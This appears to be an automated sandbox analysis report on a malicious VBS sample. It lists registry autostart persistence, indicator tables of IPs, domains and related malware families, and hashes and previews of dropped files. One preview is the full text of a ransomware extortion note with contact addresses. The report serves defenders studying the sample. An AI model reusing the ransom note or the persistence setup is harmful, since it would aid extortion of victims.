| 09:27:47 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run XPSUDTARW C:\Users\user\AppData\Local\Temp\eryy65ty.exe |
| 09:27:55 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run XPSUDTARW C:\Users\user\AppData\Local\Temp\eryy65ty.exe |
| 09:28:24 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt |
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
| --- | --- | --- | --- | --- | --- | --- |
| 45.125.67.168 | NOTIFICATION_OF_DEPENDANTS.vbs | Get hash | malicious | Unknown | Browse | |

| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
| --- | --- | --- | --- | --- | --- | --- |
| kiltone.top | NOTIFICATION_OF_DEPENDANTS.vbs | Get hash | malicious | Unknown | Browse | 45.125.67.168 |

| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
| --- | --- | --- | --- | --- | --- | --- |
| TELE-ASTeleAsiaLimitedHK | NOTIFICATION_OF_DEPENDANTS.vbs | Get hash | malicious | Unknown | Browse | 45.125.67.168 |
| | R7bv9d6gTH.dll | Get hash | malicious | Unknown | Browse | 103.253.43.248 |
| | http://9089357365.com/ | Get hash | malicious | Phisher | Browse | 45.125.65.213 |
| | UBONg7lmVR.exe | Get hash | malicious | Unknown | Browse | 45.125.66.18 |
| | UBONg7lmVR.exe | Get hash | malicious | Unknown | Browse | 45.125.66.18 |
| | 1feP5qTCl0.exe | Get hash | malicious | Unknown | Browse | 45.125.66.18 |
| | V6ZsDcgx4N.exe | Get hash | malicious | Unknown | Browse | 45.125.66.18 |
| | V6ZsDcgx4N.exe | Get hash | malicious | Unknown | Browse | 45.125.66.18 |
| | https://57365oo.cc/ | Get hash | malicious | Phisher | Browse | 45.125.65.213 |
| | zte.arm7.elf | Get hash | malicious | Unknown | Browse | 45.125.66.78 |

| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
| --- | --- | --- | --- | --- | --- | --- |
| 3b5074b1b5d032e5620f69f9f700ff0e | wmdqEYgW2i.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 45.125.67.168 |
| | LaRHzSijsq.exe | Get hash | malicious | DCRat | Browse | 45.125.67.168 |
| | Whatsapp-GUI.exe | Get hash | malicious | DarkGate, MailPassView | Browse | 45.125.67.168 |
| | Whatsapp-GUI.exe | Get hash | malicious | DarkGate, MailPassView | Browse | 45.125.67.168 |
| | RdLfpZY5A9.exe | Get hash | malicious | 77Rootkit, XWorm | Browse | 45.125.67.168 |
| | FEDEX234598765.html | Get hash | malicious | WinSearchAbuse | Browse | 45.125.67.168 |
| | 3edTbzftGf.exe | Get hash | malicious | Discord Token Stealer, DotStealer | Browse | 45.125.67.168 |
| | NOTIFICATION_OF_DEPENDANTS.vbs | Get hash | malicious | Unknown | Browse | 45.125.67.168 |
| | PO_0099822111ORDER.js | Get hash | malicious | Remcos | Browse | 45.125.67.168 |
| | Shipment 990847575203.pdf.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 45.125.67.168 |

| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
| --- | --- | --- | --- | --- | --- | --- |
| C:\Users\user\AppData\Local\Temp\eryy65ty.exe | NOTIFICATION_OF_DEPENDANTS.vbs | Get hash | malicious | Unknown | Browse | |
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:modified
                                                                                                    Size (bytes):1265
                                                                                                    Entropy (8bit):7.856856774089695
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Sixt1CC9ZwXy+TgF77fmddaqHowf+dHoudG6gg9T4xjp1/rCMOk:pCC/wiF774MqHd26zgKlBrOk
                                                                                                    MD5:3648C9C39F2186A378D08D22B102CF18
                                                                                                    SHA1:E846E9B34CB2ED534022D39B0ED7D93B93D958BD
                                                                                                    SHA-256:4E745910EC4814B60D7B1E1AFC165DD330D0989F41E00FBCC3E371AC61665A4C
                                                                                                    SHA-512:C3536796B3BC2CE1E4BA04972FADBF38EA2369EBFD8A640A6115FC0ED497EDD7B5F5228B20866A94FA4ED072E5395EEF9513CE4E9C3D58E0E4FA6E022C3E49DF
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1265
                                                                                                    Entropy (8bit):7.856856774089695
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Sixt1CC9ZwXy+TgF77fmddaqHowf+dHoudG6gg9T4xjp1/rCMOk:pCC/wiF774MqHd26zgKlBrOk
                                                                                                    MD5:3648C9C39F2186A378D08D22B102CF18
                                                                                                    SHA1:E846E9B34CB2ED534022D39B0ED7D93B93D958BD
                                                                                                    SHA-256:4E745910EC4814B60D7B1E1AFC165DD330D0989F41E00FBCC3E371AC61665A4C
                                                                                                    SHA-512:C3536796B3BC2CE1E4BA04972FADBF38EA2369EBFD8A640A6115FC0ED497EDD7B5F5228B20866A94FA4ED072E5395EEF9513CE4E9C3D58E0E4FA6E022C3E49DF
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.225659107027237
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:APq6YgHnziTxZQfJsNmtPBXwhu/dZqy9QuImSOSTHZSen:S8gTiTjQwWZwY1ZVquImpCZSen
                                                                                                    MD5:DF5A70CF732B54D0831C0F272DF20F6E
                                                                                                    SHA1:2FF33C92396F1037AE11FA91CC384040E88E7A94
                                                                                                    SHA-256:E2E75B4AB3624D24850E5577FB175645EBF4C022A177D9134B55FB7D10400477
                                                                                                    SHA-512:E7C123E546DDBF4B7DEE4D6237C118D01C45FB4330B0CA8132CD1D650B5FE8684428A2DD3BE39522D1C204D5E42CADCCD7AD830FC744C56DFC4853942941ECA9
                                                                                                    Malicious:false
                                                                                                    Preview:...I.f.C.z*.P..............^j9.@..Vn>.'!...KP..y..e..J...k...T..^>.5=..<R..R....s...ch..P...yo...J.+.@...V..f.(.J+?1Q.J....s...sC,9...Gv.!..JW.^.2j-.r.mY.....L..7...%..X...x...V..?..~.Y..gs....Y..r.g\....:.,d..1.v+6!..L\.........W@Psq|Y.MK9.{.vF?6b.....W..*....-.$:.....gu..0xABADCABA
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64
                                                                                                    Entropy (8bit):1.1510207563435464
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:NlllulFllh:NllUF/
                                                                                                    MD5:8FC5F52E0D83D36163A2D88EFD76657A
                                                                                                    SHA1:850A6A65DD7530F45468179AE930049745A47B2A
                                                                                                    SHA-256:CBF0BD04B2ED240B978A7E7F32FB22E801985DD756F5B0BC5DD1E7DAB6B1FFFB
                                                                                                    SHA-512:2E056CB8D6BC33077EB44F22F5C2A7A31BF249244252DB7507297744B37EA9BAC680637F847CAA669DBB8F29BAA22A91435DB20B0A0A8DB875619431729205C7
                                                                                                    Malicious:false
                                                                                                    Preview:@...e.................................K..............@..........
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):902856
                                                                                                    Entropy (8bit):6.618307623021751
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:I2wMm7l55+OeO+OeNhBBhhBBaELPA081o9baXpL3K+HDFgZUid4X9dCU5+Kazw4t:I2wMm7lfCIL3K+gY9dfcw4h3DX9X1
                                                                                                    MD5:9049FABA5517305C44BD5F28398FB6B9
                                                                                                    SHA1:036C6B32F3E7D7D689C9B4D482091EEBCC669BFA
                                                                                                    SHA-256:D2100FFE58EB50C05D97A3DA738CCD1F0BE9672C057C26A10140AF80595B78C3
                                                                                                    SHA-512:65A33506F970675775468F80B94A3F8BB2D3672E6FB08FC9F2E5107020095CA6D4BCA927C59B72488E2EF4208A64A56CED7511EA14C0445CD50EA3FF9B827F6A
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 45%
                                                                                                    • Antivirus: Virustotal, Detection: 67%, Browse
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: NOTIFICATION_OF_DEPENDANTS.vbs, Detection: malicious, Browse
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{h.............x......x..r...x......o......o......o......o......x......x..........q....o.......o...............o......Rich....................PE..L.....\g.....................$......<.............@.......................................@..................................K...........q...............(...`......0b..p....................c.......b..@...............0............................text............................... ..`.rdata.............................@..@.data...l....`...^...F..............@....rsrc....q.......r..................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.256547976919888
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:C/TmVzC7B1nXzmX5VezC0sH85IuEhzjESND3U6VxSn:aTmFC7B1n4uljSNbpSn
                                                                                                    MD5:D3CDA4442FDFB51AFF63466EEAF70FE6
                                                                                                    SHA1:1DD0071F403D9755125C0136FA4BB66FCD1DCCCD
                                                                                                    SHA-256:96FB70037A6A5B05EB5A435751FC07BF8137CA514ADD72ACD9ECD09BEBFFE498
                                                                                                    SHA-512:E4D7F0C1C22910F5BB0BFADC37BF15866F45D489046099140055B2EE161345351DA90AFB7D592ED2B9E30A57BCEFAB98E93AC259ABB65393B608E238E889E7B5
                                                                                                    Malicious:false
                                                                                                    Preview:.....WG..`...............#i".|;5?n.&U..4b.B...b.8....+....@.7S...)T...BT~.4......*.......$..Mp.z........Fy.(^9/.I....;2....@Z..-.9..-).I.P...#k2....~.8!._k...1[.H..W38/...._a....ji..\=.v~.'.E.u8A.;L3p.OyX.t.p..R.J...7..r..E..C........2..|(i.h1.{......X..".y.l.....'P6[`0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):288
                                                                                                    Entropy (8bit):7.2187907255166825
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:E7IvsiDv6NN5wDUTmXaOFeble13stEN4OrggvYxw5AmLHaaFJSn:E0vsZoeBe13saxPvHt6amn
                                                                                                    MD5:C8EE01F99D6BE60F5A5997DD9D1DF17B
                                                                                                    SHA1:3DFFE27CDB53063A7CE2F734C4C6958B76E46879
                                                                                                    SHA-256:ACA8E14BEB23DB37B5A6BEBB306A6D535B58BA938FCF5972B3A44E90C4CEC372
                                                                                                    SHA-512:026AB1527B23F1217948CEDFD776CB5400F05E6429C1D975A743E7D8DEA1E18FA21B0F01A5003F80416046C3D7FA57ACCF2BD587E621292C93C9DC0B186EBE42
                                                                                                    Malicious:false
                                                                                                    Preview:.......{.X..h.>>].>>.V.O..7.{....K"..T..m....7.#..@....X.C(,6.}.......3.O4....(.......At..n....w.........~i.+..C@..P.O..m:....*3LpTk.....}w.D}.....&......qR....}l....O.hiN..,....I...x.O.3...cX....../.3...=.s.'2U...P.6..........9L..v.%Aq.u.|.FG.mQ..h~....o.~..0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):290
                                                                                                    Entropy (8bit):7.249471827958152
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:EyKk2hxH7PTiUr4RSPSmVCJhkcdSKTvKZ+L3KsL5Sn:E4CbPTVUoABj0a3KsL5Sn
                                                                                                    MD5:3464DF7384C2C64E9C74501C2EEB4761
                                                                                                    SHA1:496059928634ED6C278CD945F53C14E726A69D7B
                                                                                                    SHA-256:F187BC5635F89561C7DEA745FFFA7590B1E33F8059E777BA050EDF493E0D44C7
                                                                                                    SHA-512:7ECB791F1A2BE7DFDB8A856BFC2E1EC403CDF3F6B0FF03C6513A843265371E1D2C9455E166662A91358099EBBA33AA526878F2D25859E8F621AE89BAF5748313
                                                                                                    Malicious:false
                                                                                                    Preview:..\Ti..!..!8...<<>>].>>.j3...tf$..;8.N....1D..1.;.h%3n.w7..c..G..B...`............K..t...{.!p.4.k..Sz.......@....W...:?7.w@.{x.......3U...g..,,E...Qy[....x.e..'...!..?...4...8.g.....TSb...@...r.:U.........<..2...#Yp.^e......"..._...1n.Q>..?ej...W...OE./....G.....w...0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:OpenPGP Public Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65716
                                                                                                    Entropy (8bit):6.570280349874584
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:Aa+uq8pQdn1nwyJhnxsxPwkZ6x5RX1X2QdQZiXEWZBMZ/dYS8VLm+kig+GPG6R:Aa/q86d1wSnxslEkZ4ZeZutbzfc
                                                                                                    MD5:B76983DA18AE4F2A21218392034793BE
                                                                                                    SHA1:D59AF858F31F690EBC583EEA453D53841B2EA2E1
                                                                                                    SHA-256:31F7C93802DE9B17937F5FE9E8B4950BA4E15028FA74BD91AA49363F58DC88DD
                                                                                                    SHA-512:5845D4F078B6C79DE41B8C5A7793932E6988E81C49D8C168BA2D78B5B77C90FF8741000BA62B3F8EE36F6F941ADCC23D99D741DA10FCF9577BB5BCB87C941B23
                                                                                                    Malicious:false
                                                                                                    Preview:..=P.2....:..N...v.....@$...^..)..-=..4.zM.|..h.b..}....oO?.4..jE..yJ....U...Q.i..93.... .....4A...z0.G..Eh.fs..(P..{ %...&X8<.`....W.o|q .H....%v|.k..O(...C$.......6........8 wm....|...s..a.....I"...0N.........0..%...F\%-S..HjE*......t...1.).F}2.I.y.V6.N..zh.>6......e....4.\.^...PD.j.....@.Wm......oP.,HyK.R.:...o.J.Nd@.D...........*~...../>..6...x...S.vXqh.........|e(.K.D. .2....;.'...R..2. ..N.5p..~....kI.-...0"\..+/..#.A.(Ay.....d.%%u.....a.:...[.NPO[...9......Hb.....T./Ab.O@.6.......z....u.\.-..V..D......`..^O...l..b.?.".%U.Ou...:Z..r......m.*.'.$..m8a..;..<g..Cj.~.......T.j.......!.lr..fLs...R...a.eE.W..o...@......*Vf..vc..P.?....2.o......../.h.2yt.a...6.dl.z.....d.P.{...a....%#.*.Tl..d.{c...z.c..m;VO...h\.M..5..)'W...P.9.b..y7.......Hd^....f..zi.n+.M.J{..G.\-{K.}...sL.C7..=.:...........t....A....wy..m....G...v...6O..X/...uz.....f.9..`.u.1.u.J.v/..3..9......K..K:d?..........K..4.{3b8.....CVz...[..c....z.La.b..v.#W..`.t.{=(../...5.... ..\.eP.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1003
                                                                                                    Entropy (8bit):7.775181647520087
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:x2GAbpowyOYBYRdhiUbqxEsfwrCmYO4ZVuTbxPw:EhpowyOXJbvrrCmYO4ZVuTbi
                                                                                                    MD5:F3921196028EB63F8BA3459CCE341DE2
                                                                                                    SHA1:07872D0DD3E26D3318686EF6E9072BEF4E2ED2E7
                                                                                                    SHA-256:42DE6FEE5FC80B5C790FF0F4CBDB0E6FEFBAC5C010128CA992799A9CDFD9D8CB
                                                                                                    SHA-512:001307FD8F6BCF69640FA80504A63AE5A168A97734E8FA01AE4DD0ABC230B5E43380D587C5D731CCD8E812E9B2DB53D0F98CFB92544789906292BBF86B91A1B7
                                                                                                    Malicious:false
                                                                                                    Preview:y....\N..^......k.D.*+CA....}...+.e..... ....r...}...k...f.p....~.M....|.l4t.}.0.....u)V?2,..a.....^..h.........$J.aU.i.@Q.Z.Z0.............2Nl@=Bd.U..7......F._.4..t...h..S...pM<..-.6/.(.B.Mq*...P....Ya..S;.0.T....$.-nK...9N.}.@.J.O..1. ..U....}..t.8"0d.H.:l..1.3u................Q.+oP.m!....A...v.u.E....OJ....0.....C'.C........G.dg...|........SVu|..Z......q..m..Q....y&...a.d%.......CJH...iqR.i..Vf.l..nu......"#....{).x....od.......X...r.............z.V.&EW.-.. (...<d.Q.v...6.g6_E.C.&.Q...c.....UQ......5~.XNF}2U....aT.Cw:l.cpwD.|R.2.y...k.Cf/....1.TsHac@....... .D..;...NGf..B.\..:../...|....v....iN;..&..4.-;.EH.E..K....Ef..Fg'\....I..F.9Z..(.Gu..\.z`...| ......?.h.R.Q.ej0...].b..m.R...Y..O..L.6H.'\..../.yv..,{.sR.O..m~.(.8. .ER.......p.@.Q.\......0..fmrE1.#..z.~.N,./<Z`/8....@.n1..H..[...kF...~.4TM.M.*s..J6.y..z..#.d.9M?....5.L...&k<O.........@.....r.i.KY........7. ...dY...q.'...@u.'.9Jy..S..B....s.^..6..O;..h.y.....Mm....U.F|..i..0xABADC
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10506
                                                                                                    Entropy (8bit):4.269148480867029
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:meATPbpdDacZqZ2UINYhbEHqpDwvL4xjQasZ9:mH7jNkoODykxi9
                                                                                                    MD5:B241A639EF4B80CF57C14BB711461CC8
                                                                                                    SHA1:45CD75B394C7ED6023D469F9B7300C744AA464A8
                                                                                                    SHA-256:944BE64C7C05BDDE7CEED147F546ABAFFB10D6F24453EFDDD84C55BE270063B9
                                                                                                    SHA-512:A50D8A4C0776CD49ECD52385CEE8C2C24EF696E4C95F48B600C1D350B5E4170F6406A8EDE8B3C3C2428FE13D4DCE68403575BD8384C5C1BD99381A427DC4B637
                                                                                                    Malicious:false
                                                                                                    Preview:^... gC.._b./:.C..e5....bW.......MC....sL...Ed.4.:..}.?.SA..ZZ...rl*........k1?...}~N*..&..c..z>N.......Q....i2j.).e...>?.>.F..y..v..h.<gAG...:;......].+`n..]p.).2o$.....+.7..m..4.&....R.)`.....[. ...D....E..}5%..=....o..F.e.;....tY.b.V.%.l..UD.$.2.."@.2.....m..d...k{.u.2......ei."...[....3{tg...$.=!.?.7.k[.@..@ub.^/..>..Ew.\.w-..}..f%..o].........l.*.....M......Z..^...|...e.%...........{.\^..J.O. ..[...Tt..q...q.H...\.Y4.qG`m..U..8..b.&.ME...../p.ML....u.......*o.x[e....ie..b.\.B.>A.6Y.....q:.;.?]=.....SFw..]..I`.!?.L.C..._.*.X.*..b.P|x.DC..?...A.`o...)...."....5.=..=..u.t(...s..,G.;!.....o@.x..\5..Wi..|...Q.o3..........O.O..... MS8..E.~.#K...$.W.v..{.F......>.%Hg.P...g.dT!/.6.[.JtBx...$....7......4....W..n.cD...1.4.{.j.@..T..4!.....q.T.e.o.5]P..Y..D~....."3z.T..K.6..u'.i<tp..)..b..L....L..e..D.[.$h......|.......j.......{.*...p...=..,...#..<.{......5.....B.i....e1.;y.Y[.......9..V...o~......qr...,[.,...... ..N+...K...A......'G .
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24418
                                                                                                    Entropy (8bit):2.3633702302706627
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:GxfYTx0JEvqS2Sdi4nuBll6w3OeTACJwUouY3+Sq6z+qE4ubVnB+2qfIs2RbKS:GF+0J4HlRnuBpEsrGz4lNB+2s23
                                                                                                    MD5:53BBB00CE4BC453434ECE5A92FF965D7
                                                                                                    SHA1:EAEAF3EB6668E97FF081E0E748EA591438952E30
                                                                                                    SHA-256:0DC8362F68C951CA374627D466C4A9FB3777B4902779C3E2F8FE369065D92500
                                                                                                    SHA-512:7DF1FE34BF9E84F0BBAB821890A0A9C8B74E14344030BA7832DFB6322984F788C92D83470366FE09FD8A5511C92FA9A885E429596D95A4A74771DB97EEFD04EE
                                                                                                    Malicious:false
                                                                                                    Preview:N.<.w.>..3.r%.)9.Q]%..I..Gi...!........mx...O\.F.A...h.D..A.!D.G..G.K..H..H#...u....<{.Ua.zU.....}....g.Z.*c~.....J.`....=.Q f...-.[..1.P2.q.r\s........?uj...:~..3,...!.<...@..f.R.....a..wk.&.B.I.o=.h....@.<.z...C......x.lPJ...9J%.........9.g..q.l.=..%3.TF.....A..O(.~..Q.......k..N!?...i..l.T...|m..)s.?..x.....;:.:..D..J.6 ..Ja.F..r.}..L...</.Rh.....v.....N.....-...r./)&.....Gm.c..I.x.J.....5.......L.S...4....D..C`.X>G.U.a...(.n....:*.....[_...f...!............;......2PD>9S.......`Z[.=.u...F...?.z1=..[.Cq.W..\..._..w..yDv./r. j.v..\...p.12g..{.}...e.Dz...k..Uh..Y3G.TX.....iW..m...^..4o....P.).N....:......8%.p...s.&..kv..;x.F.Q.....x.8...2..?.q.AN...s.....\............Y`...Y.^..<.N!/.M9...k.k'Q.....i.W.ZNC}........n...K+....LW..+.v..6.zkU..^+.O..:.on..(..+.'...V..5w?.;.Ne......s.j}h..V...R......"$.."..._.J.1Y..@I&?rgW.......H..x..D6>[f..uq..G.y..W.7.EO.i.$<..>.)...C;.`..AX`Ce.R..........cRfx...K...i@_..R|......5Dz^t.)Z/%.4..}9....
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):530
                                                                                                    Entropy (8bit):7.588102265512348
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:Gleul5DzBQptz3Gn0gGYhe9vDSPtJCvcRcc7l3n:GlDPBQH3Gn5B0vutIvo3
                                                                                                    MD5:B961770EF2CE1E4BF24AC0586F3BBE1B
                                                                                                    SHA1:501B4883DDEE6F52454C11A742F00F54C01CC931
                                                                                                    SHA-256:96DFBC4B9AA11208F8F3082715DC3D8DA6D7A23BCD14890FC15CA9C58A04A4D7
                                                                                                    SHA-512:FC7037E372FF3B9F43E4DC484EF75151B5CAD95FB7FA3160F0FBD83DA1EA3957C04E69526D6FA2DF03D315E1594D0C97B1018E71EB5AD0407219E571DC7D3461
                                                                                                    Malicious:false
                                                                                                    Preview:.V*....".,._r%.....A.....M.b.u+..'*@.a.m........... .^...d.......k..;..JL....l.2..gy.Bf="...9.B.X...plI(..som...j..?.`kL.......(g,V......9...n.........G}n.^.k...6..5...x.:E..]........`..?...(...X...n.g.F....Px.i2...Zg...Y...L.d./...QO.O^..:.F......N.v.ba'J.....ESNwp.E._8.s.....\Z...._}.R)./Q.p!.RhM....m]...+.%......n.....M|.|dJ._L.MXp.I.t..EZFVE.."`.3.B....aH..C......V...-..._..!.....U?...9Y..4.].i.y.W.(@ON.).N.R.%f.H...KP.O'<n..y....K\j..G...q...=p;sp}...z.=...K..v.!.z{.]..c..9.'._..z....k|0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
